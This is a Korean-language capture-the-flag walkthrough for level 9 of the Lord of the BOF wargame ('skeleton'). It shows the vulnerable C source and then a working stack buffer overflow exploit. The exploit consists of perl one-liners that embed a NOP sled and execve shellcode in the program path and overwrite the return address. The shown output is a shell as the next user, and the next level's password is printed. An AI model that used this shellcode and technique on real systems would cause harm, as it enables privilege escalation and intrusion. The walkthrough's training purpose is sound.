

level 9 -> 10


[vampire@localhost vampire]$ cat skeleton.c 

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "skeleton" challenge binary.
 *
 * Takes one argument (argv[1]), copies it into a 40-byte stack buffer with
 * an unbounded strcpy() after checking only that byte 47 is 0xbf and that
 * strlen(argv[1]) is not greater than 48, then zeroes the buffer, every
 * environ string and every argv string before falling off the end.
 * The length check rejects only arguments longer than 48 bytes, so up to
 * 48 bytes (plus the NUL written by strcpy) reach the 40-byte buffer.
 *
 * Pre-C99 style: main has no explicit return type and no return statement,
 * and <string.h> is not included, so memset/strlen/strcpy are implicitly
 * declared (stdio.h and stdlib.h are the only headers pulled in).
 */
main(int argc, char *argv[])
{
char buffer[40];          /* destination of the unbounded strcpy() below */
int i, saved_argc;

/* Require an argument; exits with status 0 rather than a failure code. */
if(argc < 2){
printf("argv error\n");
exit(0);
}

// egghunter: overwrite every environment string with zeros, so nothing
// placed in the environment survives to the point of the strcpy() below.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));

/* Byte 47 of argv[1] must be 0xbf.  This index is read unconditionally,
 * before the length check below, so it is read even when argv[1] is
 * shorter than 48 bytes (past the string's NUL terminator). */
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}

// check the length of argument: only strictly-longer-than-48 is rejected,
// so a 48-byte argument passes although buffer holds 40 bytes.
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}

// argc saver: argv strings are zeroed at the end, keep the count here.
saved_argc = argc;

/* Unbounded copy: the only size guard is the strlen() > 48 check above. */
strcpy(buffer, argv[1]); 
printf("%s\n", buffer);

        // buffer hunter: zero the local buffer once it has been printed.
        memset(buffer, 0, 40);

// ultra argv hunter!: zero every argv string, argv[0] included.
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}


이런 부랄헌터+모든인자 초기화+버퍼 초기화가 되어버렸네요


흠 뭐하지 생각하면서 argv영역 보다가 스택 끝에 보게됬는데 0xbffffff0영역에 프로그램 실행할 때 사용한 명령이 있더라구요 왠진 모르겠는데;


암튼 이걸이용해봅시다 아까 심볼릭링크 안되서 짜증났는데 이번에는 그냥 디렉터리 명도 같이 들어가니까 디렉터리로 생성하고 해볼께여


`perl -e 'print "/home/vampire/test/", "\x90"x100, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "/skeleton"'` `perl -e 'print "A"x44, "\x80\xff\xff\xbf"'`


분명 저 위치에 널널하게 nop박혀있고 정상적으로 실행되야 맞는건데 안되네예


`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x90"x40'`


./`perl -e 'print "\x90"x40,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "A"x44,"\xb0\xff\xff\xbf"'` 


[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "A"x44,"\xb0\xff\xff\xbf"'` ` 

?????????????????????????????????????????????


bash$ my-pass 

euid = 510

shellcoder

bash$


